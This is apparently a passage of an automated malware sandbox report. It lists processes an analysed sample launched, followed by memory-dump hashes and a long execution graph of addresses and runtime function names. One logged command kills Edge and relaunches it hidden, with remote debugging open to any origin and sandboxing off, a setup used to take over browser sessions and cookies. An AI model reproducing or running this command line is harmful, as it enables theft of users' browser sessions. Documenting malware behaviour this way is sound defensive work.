                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                                                                                                    Start time:16:14:12
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                                                                                                    Start time:16:14:12
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                                                                                                    Start time:16:14:12
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Reset < >
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 0be2b1bd90ae2849fd6798d25e8c2374b5bf5ffbb8b79d98fbd8dbc25a083359
                                                                                                                                                                                                                                                                                      • Instruction ID: 2451909314b46b4fef0f0273b1bafa34d647dd69f7a259c8b7f92928427ad703
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0be2b1bd90ae2849fd6798d25e8c2374b5bf5ffbb8b79d98fbd8dbc25a083359
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F0F6B654CA30FF018ED1DA135D5B27D9FAA9B730730C426B10BC7F01D294097C9A22
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5c701d59b1ffaa6ae11063e1c80da35686effa6a7891ed9118dc6cc5739cba5a
                                                                                                                                                                                                                                                                                      • Instruction ID: 6eb4b67382571482876c09ad00edf222d710d71fa8f6aed7391f6a6c74f8a567
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c701d59b1ffaa6ae11063e1c80da35686effa6a7891ed9118dc6cc5739cba5a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5231CDB700DBB0AFE34BC6B0095C1F67FAFEA9323033440A7E482C6D53E145095E8622
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: ae2feab2f8673c36c7a3ebcb9a2c88c88dd6dea98d7893eeead348f178bca0c0
                                                                                                                                                                                                                                                                                      • Instruction ID: bc16e61f8861ee9661f68241fb26e20868a92923020ee79d70f26cf2e9bd9d39
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae2feab2f8673c36c7a3ebcb9a2c88c88dd6dea98d7893eeead348f178bca0c0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0F0B204CE30EE018EE1E6534D9B23E5FBA9B770720C412B14BC6E01D1A81A7C9A22
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 259f5a41997cccc73b9f9525c90c19b9830b115ff3f9d0b86da56b0407bce1a8
                                                                                                                                                                                                                                                                                      • Instruction ID: 2fc20095f811edbcdaa6f2fb9a11c2158f612d5389df5e40356dc28d76ba736c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 259f5a41997cccc73b9f9525c90c19b9830b115ff3f9d0b86da56b0407bce1a8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0507380DA70DA934ED531048E1F27F5B3D53621358C46AA5839AF43D10B517FDA22
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 070244ba679f27652d0b013e1b7beca1fc4320bbce517e52ab66dc2f9d39271f
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f7d5724343669df58f0dd54d6a6955a34ecb24db2447b06114343c94b5ed087
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 070244ba679f27652d0b013e1b7beca1fc4320bbce517e52ab66dc2f9d39271f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0E57244CD30EE408DE1DA224E5F27E5FBA5B671720C903B04BC5F01D268027D9E23
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 318a5cf5b6c9fa913ad28be35c486c15724774d3188a17af98e890da15a1fa5a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5d184a169e58e84218e85181c8c37bfc382350de3729a3ab2ea4e8e0ced5bd9a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 318a5cf5b6c9fa913ad28be35c486c15724774d3188a17af98e890da15a1fa5a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0683280CD30CA924DF57602CE0BA7A2F36A65207B0C817B803C6E02C20B52BE9C12
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2108057620.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5320000_file.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 7a9121bb6ed29dd2515f17e56c4248fb41bc8f9514d67764969c4cb8b3399223
                                                                                                                                                                                                                                                                                      • Instruction ID: 42d04b9097ae1db0df4be04476aa97c7d91739de37a7df101684467ce0c5e60c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a9121bb6ed29dd2515f17e56c4248fb41bc8f9514d67764969c4cb8b3399223
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BED012B2409D30D940CEE266164E2F17D1F765AA353A0C603B98795F42821D06BC9D53

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:10.3%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:19.7%
                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:36
                                                                                                                                                                                                                                                                                      execution_graph 20210 7ff7e12d9d50 20213 7ff7e12d9ccc 20210->20213 20220 7ff7e12e02d8 EnterCriticalSection 20213->20220 20413 7ff7e12dafd0 20414 7ff7e12dafd5 20413->20414 20418 7ff7e12dafea 20413->20418 20419 7ff7e12daff0 20414->20419 20420 7ff7e12db032 20419->20420 20423 7ff7e12db03a 20419->20423 20421 7ff7e12da948 __free_lconv_num 11 API calls 20420->20421 20421->20423 20422 7ff7e12da948 __free_lconv_num 11 API calls 20424 7ff7e12db047 20422->20424 20423->20422 20425 7ff7e12da948 __free_lconv_num 11 API calls 20424->20425 20426 7ff7e12db054 20425->20426 20427 7ff7e12da948 __free_lconv_num 11 API calls 20426->20427 20428 7ff7e12db061 20427->20428 20429 7ff7e12da948 __free_lconv_num 11 API calls 20428->20429 20430 7ff7e12db06e 20429->20430 20431 7ff7e12da948 __free_lconv_num 11 API calls 20430->20431 20432 7ff7e12db07b 20431->20432 20433 7ff7e12da948 __free_lconv_num 11 API calls 20432->20433 20434 7ff7e12db088 20433->20434 20435 7ff7e12da948 __free_lconv_num 11 API calls 20434->20435 20436 7ff7e12db095 20435->20436 20437 7ff7e12da948 __free_lconv_num 11 API calls 20436->20437 20438 7ff7e12db0a5 20437->20438 20439 7ff7e12da948 __free_lconv_num 11 API calls 20438->20439 20440 7ff7e12db0b5 20439->20440 20445 7ff7e12dae94 20440->20445 20459 7ff7e12e02d8 EnterCriticalSection 20445->20459 20224 7ff7e12ccb50 20225 7ff7e12ccb60 20224->20225 20241 7ff7e12d9ba8 20225->20241 20227 7ff7e12ccb6c 20247 7ff7e12cce48 20227->20247 20229 7ff7e12cd12c 7 API calls 20231 7ff7e12ccc05 20229->20231 20230 7ff7e12ccb84 _RTC_Initialize 20239 7ff7e12ccbd9 20230->20239 20252 7ff7e12ccff8 20230->20252 20233 7ff7e12ccb99 20255 7ff7e12d9014 20233->20255 20239->20229 20240 7ff7e12ccbf5 20239->20240 20242 7ff7e12d9bb9 20241->20242 20243 7ff7e12d4f08 _set_fmode 11 API calls 20242->20243 20246 7ff7e12d9bc1 20242->20246 20244 7ff7e12d9bd0 20243->20244 20245 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 20244->20245 20245->20246 20246->20227 20248 7ff7e12cce59 20247->20248 20251 7ff7e12cce5e __scrt_acquire_startup_lock 20247->20251 20249 7ff7e12cd12c 7 API calls 20248->20249 20248->20251 20250 7ff7e12cced2 20249->20250 20251->20230 20280 7ff7e12ccfbc 20252->20280 20254 7ff7e12cd001 20254->20233 20256 7ff7e12d9034 20255->20256 20257 7ff7e12ccba5 20255->20257 20258 7ff7e12d9052 GetModuleFileNameW 20256->20258 20259 7ff7e12d903c 20256->20259 20257->20239 20279 7ff7e12cd0cc InitializeSListHead 20257->20279 20263 7ff7e12d907d 20258->20263 20260 7ff7e12d4f08 _set_fmode 11 API calls 20259->20260 20261 7ff7e12d9041 20260->20261 20262 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 20261->20262 20262->20257 20264 7ff7e12d8fb4 11 API calls 20263->20264 20265 7ff7e12d90bd 20264->20265 20266 7ff7e12d90c5 20265->20266 20270 7ff7e12d90dd 20265->20270 20267 7ff7e12d4f08 _set_fmode 11 API calls 20266->20267 20268 7ff7e12d90ca 20267->20268 20269 7ff7e12da948 __free_lconv_num 11 API calls 20268->20269 20269->20257 20271 7ff7e12d90ff 20270->20271 20273 7ff7e12d9144 20270->20273 20274 7ff7e12d912b 20270->20274 20272 7ff7e12da948 __free_lconv_num 11 API calls 20271->20272 20272->20257 20276 7ff7e12da948 __free_lconv_num 11 API calls 20273->20276 20275 7ff7e12da948 __free_lconv_num 11 API calls 20274->20275 20277 7ff7e12d9134 20275->20277 20276->20271 20278 7ff7e12da948 __free_lconv_num 11 API calls 20277->20278 20278->20257 20281 7ff7e12ccfd6 20280->20281 20283 7ff7e12ccfcf 20280->20283 20284 7ff7e12da1ec 20281->20284 20283->20254 20287 7ff7e12d9e28 20284->20287 20294 7ff7e12e02d8 EnterCriticalSection 20287->20294 18774 7ff7e12e08c8 18775 7ff7e12e08ec 18774->18775 18778 7ff7e12e08fc 18774->18778 18776 7ff7e12d4f08 _set_fmode 11 API calls 18775->18776 18777 7ff7e12e08f1 18776->18777 18779 7ff7e12e0bdc 18778->18779 18780 7ff7e12e091e 18778->18780 18781 7ff7e12d4f08 _set_fmode 11 API calls 18779->18781 18782 7ff7e12e093f 18780->18782 18905 7ff7e12e0f84 18780->18905 18783 7ff7e12e0be1 18781->18783 18786 7ff7e12e09b1 18782->18786 18788 7ff7e12e0965 18782->18788 18796 7ff7e12e09a5 18782->18796 18785 7ff7e12da948 __free_lconv_num 11 API calls 18783->18785 18785->18777 18790 7ff7e12deb98 _set_fmode 11 API calls 18786->18790 18804 7ff7e12e0974 18786->18804 18787 7ff7e12e0a5e 18795 7ff7e12e0a7b 18787->18795 18802 7ff7e12e0acd 18787->18802 18920 7ff7e12d96c0 18788->18920 18793 7ff7e12e09c7 18790->18793 18792 7ff7e12da948 __free_lconv_num 11 API calls 18792->18777 18797 7ff7e12da948 __free_lconv_num 11 API calls 18793->18797 18800 7ff7e12da948 __free_lconv_num 11 API calls 18795->18800 18796->18787 18796->18804 18926 7ff7e12e712c 18796->18926 18806 7ff7e12e09d5 18797->18806 18798 7ff7e12e096f 18801 7ff7e12d4f08 _set_fmode 11 API calls 18798->18801 18799 7ff7e12e098d 18799->18796 18803 7ff7e12e0f84 45 API calls 18799->18803 18808 7ff7e12e0a84 18800->18808 18801->18804 18802->18804 18805 7ff7e12e33dc 40 API calls 18802->18805 18803->18796 18804->18792 18807 7ff7e12e0b0a 18805->18807 18806->18796 18806->18804 18809 7ff7e12deb98 _set_fmode 11 API calls 18806->18809 18810 7ff7e12da948 __free_lconv_num 11 API calls 18807->18810 18818 7ff7e12e0a89 18808->18818 18962 7ff7e12e33dc 18808->18962 18812 7ff7e12e09f7 18809->18812 18814 7ff7e12e0b14 18810->18814 18813 7ff7e12da948 __free_lconv_num 11 API calls 18812->18813 18813->18796 18814->18804 18814->18818 18815 7ff7e12e0bd0 18817 7ff7e12da948 __free_lconv_num 11 API calls 18815->18817 18816 7ff7e12e0ab5 18819 7ff7e12da948 __free_lconv_num 11 API calls 18816->18819 18817->18777 18818->18815 18818->18818 18820 7ff7e12deb98 _set_fmode 11 API calls 18818->18820 18819->18818 18821 7ff7e12e0b58 18820->18821 18822 7ff7e12e0b60 18821->18822 18823 7ff7e12e0b69 18821->18823 18825 7ff7e12da948 __free_lconv_num 11 API calls 18822->18825 18824 7ff7e12da4a4 __std_exception_copy 37 API calls 18823->18824 18826 7ff7e12e0b78 18824->18826 18827 7ff7e12e0b67 18825->18827 18828 7ff7e12e0b80 18826->18828 18829 7ff7e12e0c0b 18826->18829 18832 7ff7e12da948 __free_lconv_num 11 API calls 18827->18832 18971 7ff7e12e7244 18828->18971 18831 7ff7e12da900 _isindst 17 API calls 18829->18831 18834 7ff7e12e0c1f 18831->18834 18832->18777 18837 7ff7e12e0c48 18834->18837 18842 7ff7e12e0c58 18834->18842 18835 7ff7e12e0bc8 18840 7ff7e12da948 __free_lconv_num 11 API calls 18835->18840 18836 7ff7e12e0ba7 18838 7ff7e12d4f08 _set_fmode 11 API calls 18836->18838 18839 7ff7e12d4f08 _set_fmode 11 API calls 18837->18839 18841 7ff7e12e0bac 18838->18841 18864 7ff7e12e0c4d 18839->18864 18840->18815 18844 7ff7e12da948 __free_lconv_num 11 API calls 18841->18844 18843 7ff7e12e0f3b 18842->18843 18845 7ff7e12e0c7a 18842->18845 18846 7ff7e12d4f08 _set_fmode 11 API calls 18843->18846 18844->18827 18847 7ff7e12e0c97 18845->18847 18990 7ff7e12e106c 18845->18990 18848 7ff7e12e0f40 18846->18848 18851 7ff7e12e0d0b 18847->18851 18853 7ff7e12e0cbf 18847->18853 18859 7ff7e12e0cff 18847->18859 18850 7ff7e12da948 __free_lconv_num 11 API calls 18848->18850 18850->18864 18855 7ff7e12e0d33 18851->18855 18860 7ff7e12deb98 _set_fmode 11 API calls 18851->18860 18875 7ff7e12e0cce 18851->18875 18852 7ff7e12e0dbe 18862 7ff7e12e0ddb 18852->18862 18872 7ff7e12e0e2e 18852->18872 19005 7ff7e12d96fc 18853->19005 18857 7ff7e12deb98 _set_fmode 11 API calls 18855->18857 18855->18859 18855->18875 18863 7ff7e12e0d55 18857->18863 18858 7ff7e12da948 __free_lconv_num 11 API calls 18858->18864 18859->18852 18859->18875 19011 7ff7e12e6fec 18859->19011 18865 7ff7e12e0d25 18860->18865 18868 7ff7e12da948 __free_lconv_num 11 API calls 18862->18868 18869 7ff7e12da948 __free_lconv_num 11 API calls 18863->18869 18870 7ff7e12da948 __free_lconv_num 11 API calls 18865->18870 18866 7ff7e12e0ce7 18866->18859 18874 7ff7e12e106c 45 API calls 18866->18874 18867 7ff7e12e0cc9 18871 7ff7e12d4f08 _set_fmode 11 API calls 18867->18871 18873 7ff7e12e0de4 18868->18873 18869->18859 18870->18855 18871->18875 18872->18875 18876 7ff7e12e33dc 40 API calls 18872->18876 18879 7ff7e12e33dc 40 API calls 18873->18879 18882 7ff7e12e0dea 18873->18882 18874->18859 18875->18858 18877 7ff7e12e0e6c 18876->18877 18878 7ff7e12da948 __free_lconv_num 11 API calls 18877->18878 18880 7ff7e12e0e76 18878->18880 18883 7ff7e12e0e16 18879->18883 18880->18875 18880->18882 18881 7ff7e12e0f2f 18884 7ff7e12da948 __free_lconv_num 11 API calls 18881->18884 18882->18881 18886 7ff7e12deb98 _set_fmode 11 API calls 18882->18886 18885 7ff7e12da948 __free_lconv_num 11 API calls 18883->18885 18884->18864 18885->18882 18887 7ff7e12e0ebb 18886->18887 18888 7ff7e12e0ec3 18887->18888 18889 7ff7e12e0ecc 18887->18889 18890 7ff7e12da948 __free_lconv_num 11 API calls 18888->18890 18891 7ff7e12e0474 37 API calls 18889->18891 18892 7ff7e12e0eca 18890->18892 18893 7ff7e12e0eda 18891->18893 18899 7ff7e12da948 __free_lconv_num 11 API calls 18892->18899 18894 7ff7e12e0f6f 18893->18894 18895 7ff7e12e0ee2 SetEnvironmentVariableW 18893->18895 18898 7ff7e12da900 _isindst 17 API calls 18894->18898 18896 7ff7e12e0f06 18895->18896 18897 7ff7e12e0f27 18895->18897 18900 7ff7e12d4f08 _set_fmode 11 API calls 18896->18900 18902 7ff7e12da948 __free_lconv_num 11 API calls 18897->18902 18901 7ff7e12e0f83 18898->18901 18899->18864 18903 7ff7e12e0f0b 18900->18903 18902->18881 18904 7ff7e12da948 __free_lconv_num 11 API calls 18903->18904 18904->18892 18906 7ff7e12e0fa1 18905->18906 18907 7ff7e12e0fb9 18905->18907 18906->18782 18908 7ff7e12deb98 _set_fmode 11 API calls 18907->18908 18914 7ff7e12e0fdd 18908->18914 18909 7ff7e12da504 _CreateFrameInfo 45 API calls 18911 7ff7e12e1068 18909->18911 18910 7ff7e12e103e 18912 7ff7e12da948 __free_lconv_num 11 API calls 18910->18912 18912->18906 18913 7ff7e12deb98 _set_fmode 11 API calls 18913->18914 18914->18910 18914->18913 18915 7ff7e12da948 __free_lconv_num 11 API calls 18914->18915 18916 7ff7e12da4a4 __std_exception_copy 37 API calls 18914->18916 18917 7ff7e12e104d 18914->18917 18919 7ff7e12e1062 18914->18919 18915->18914 18916->18914 18918 7ff7e12da900 _isindst 17 API calls 18917->18918 18918->18919 18919->18909 18921 7ff7e12d96d0 18920->18921 18922 7ff7e12d96d9 18920->18922 18921->18922 19035 7ff7e12d9198 18921->19035 18922->18798 18922->18799 18927 7ff7e12e6254 18926->18927 18928 7ff7e12e7139 18926->18928 18929 7ff7e12e6261 18927->18929 18935 7ff7e12e6297 18927->18935 18930 7ff7e12d4f4c 45 API calls 18928->18930 18932 7ff7e12d4f08 _set_fmode 11 API calls 18929->18932 18946 7ff7e12e6208 18929->18946 18931 7ff7e12e716d 18930->18931 18939 7ff7e12e7183 18931->18939 18943 7ff7e12e719a 18931->18943 18959 7ff7e12e7172 18931->18959 18936 7ff7e12e626b 18932->18936 18933 7ff7e12e62c1 18934 7ff7e12d4f08 _set_fmode 11 API calls 18933->18934 18937 7ff7e12e62c6 18934->18937 18935->18933 18938 7ff7e12e62e6 18935->18938 18940 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 18936->18940 18941 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 18937->18941 18942 7ff7e12e62d1 18938->18942 18947 7ff7e12d4f4c 45 API calls 18938->18947 18944 7ff7e12d4f08 _set_fmode 11 API calls 18939->18944 18945 7ff7e12e6276 18940->18945 18941->18942 18942->18796 18949 7ff7e12e71a4 18943->18949 18950 7ff7e12e71b6 18943->18950 18948 7ff7e12e7188 18944->18948 18945->18796 18946->18796 18947->18942 18954 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 18948->18954 18951 7ff7e12d4f08 _set_fmode 11 API calls 18949->18951 18952 7ff7e12e71de 18950->18952 18953 7ff7e12e71c7 18950->18953 18955 7ff7e12e71a9 18951->18955 19277 7ff7e12e8f4c 18952->19277 19268 7ff7e12e62a4 18953->19268 18954->18959 18958 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 18955->18958 18958->18959 18959->18796 18961 7ff7e12d4f08 _set_fmode 11 API calls 18961->18959 18963 7ff7e12e341b 18962->18963 18964 7ff7e12e33fe 18962->18964 18966 7ff7e12e3425 18963->18966 19317 7ff7e12e7c38 18963->19317 18964->18963 18965 7ff7e12e340c 18964->18965 18967 7ff7e12d4f08 _set_fmode 11 API calls 18965->18967 19324 7ff7e12e7c74 18966->19324 18969 7ff7e12e3411 __scrt_get_show_window_mode 18967->18969 18969->18816 18972 7ff7e12d4f4c 45 API calls 18971->18972 18973 7ff7e12e72aa 18972->18973 18974 7ff7e12e72b8 18973->18974 19336 7ff7e12def24 18973->19336 19339 7ff7e12d54ac 18974->19339 18978 7ff7e12e73a4 18981 7ff7e12e73b5 18978->18981 18982 7ff7e12da948 __free_lconv_num 11 API calls 18978->18982 18979 7ff7e12d4f4c 45 API calls 18980 7ff7e12e7327 18979->18980 18984 7ff7e12def24 5 API calls 18980->18984 18987 7ff7e12e7330 18980->18987 18983 7ff7e12e0ba3 18981->18983 18985 7ff7e12da948 __free_lconv_num 11 API calls 18981->18985 18982->18981 18983->18835 18983->18836 18984->18987 18985->18983 18986 7ff7e12d54ac 14 API calls 18988 7ff7e12e738b 18986->18988 18987->18986 18988->18978 18989 7ff7e12e7393 SetEnvironmentVariableW 18988->18989 18989->18978 18991 7ff7e12e108f 18990->18991 18992 7ff7e12e10ac 18990->18992 18991->18847 18993 7ff7e12deb98 _set_fmode 11 API calls 18992->18993 18998 7ff7e12e10d0 18993->18998 18994 7ff7e12e1131 18997 7ff7e12da948 __free_lconv_num 11 API calls 18994->18997 18995 7ff7e12da504 _CreateFrameInfo 45 API calls 18996 7ff7e12e115a 18995->18996 18997->18991 18998->18994 18999 7ff7e12deb98 _set_fmode 11 API calls 18998->18999 19000 7ff7e12da948 __free_lconv_num 11 API calls 18998->19000 19001 7ff7e12e0474 37 API calls 18998->19001 19002 7ff7e12e1140 18998->19002 19004 7ff7e12e1154 18998->19004 18999->18998 19000->18998 19001->18998 19003 7ff7e12da900 _isindst 17 API calls 19002->19003 19003->19004 19004->18995 19006 7ff7e12d9715 19005->19006 19007 7ff7e12d970c 19005->19007 19006->18866 19006->18867 19007->19006 19361 7ff7e12d920c 19007->19361 19012 7ff7e12e6ff9 19011->19012 19013 7ff7e12e7026 19011->19013 19012->19013 19014 7ff7e12e6ffe 19012->19014 19016 7ff7e12e706a 19013->19016 19019 7ff7e12e7089 19013->19019 19033 7ff7e12e705e __crtLCMapStringW 19013->19033 19015 7ff7e12d4f08 _set_fmode 11 API calls 19014->19015 19017 7ff7e12e7003 19015->19017 19018 7ff7e12d4f08 _set_fmode 11 API calls 19016->19018 19020 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19017->19020 19021 7ff7e12e706f 19018->19021 19022 7ff7e12e7093 19019->19022 19023 7ff7e12e70a5 19019->19023 19024 7ff7e12e700e 19020->19024 19027 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19021->19027 19025 7ff7e12d4f08 _set_fmode 11 API calls 19022->19025 19026 7ff7e12d4f4c 45 API calls 19023->19026 19024->18859 19028 7ff7e12e7098 19025->19028 19029 7ff7e12e70b2 19026->19029 19027->19033 19030 7ff7e12da8e0 _invalid_parameter_noinfo 37 API calls 19028->19030 19029->19033 19408 7ff7e12e8b08 19029->19408 19030->19033 19033->18859 19034 7ff7e12d4f08 _set_fmode 11 API calls 19034->19033 19036 7ff7e12d91b1 19035->19036 19037 7ff7e12d91ad 19035->19037 19058 7ff7e12e25f0 19036->19058 19037->18922 19050 7ff7e12d94ec 19037->19050 19042 7ff7e12d91c3 19044 7ff7e12da948 __free_lconv_num 11 API calls 19042->19044 19043 7ff7e12d91cf 19084 7ff7e12d927c 19043->19084 19044->19037 19047 7ff7e12da948 __free_lconv_num 11 API calls 19048 7ff7e12d91f6 19047->19048 19049 7ff7e12da948 __free_lconv_num 11 API calls 19048->19049 19049->19037 19051 7ff7e12d9515 19050->19051 19056 7ff7e12d952e 19050->19056 19051->18922 19052 7ff7e12deb98 _set_fmode 11 API calls 19052->19056 19053 7ff7e12d95be 19055 7ff7e12da948 __free_lconv_num 11 API calls 19053->19055 19054 7ff7e12e07e8 WideCharToMultiByte 19054->19056 19055->19051 19056->19051 19056->19052 19056->19053 19056->19054 19057 7ff7e12da948 __free_lconv_num 11 API calls 19056->19057 19057->19056 19059 7ff7e12e25fd 19058->19059 19060 7ff7e12d91b6 19058->19060 19103 7ff7e12db224 19059->19103 19064 7ff7e12e292c GetEnvironmentStringsW 19060->19064 19065 7ff7e12d91bb 19064->19065 19066 7ff7e12e295c 19064->19066 19065->19042 19065->19043 19067 7ff7e12e07e8 WideCharToMultiByte 19066->19067 19068 7ff7e12e29ad 19067->19068 19069 7ff7e12e29b4 FreeEnvironmentStringsW 19068->19069 19070 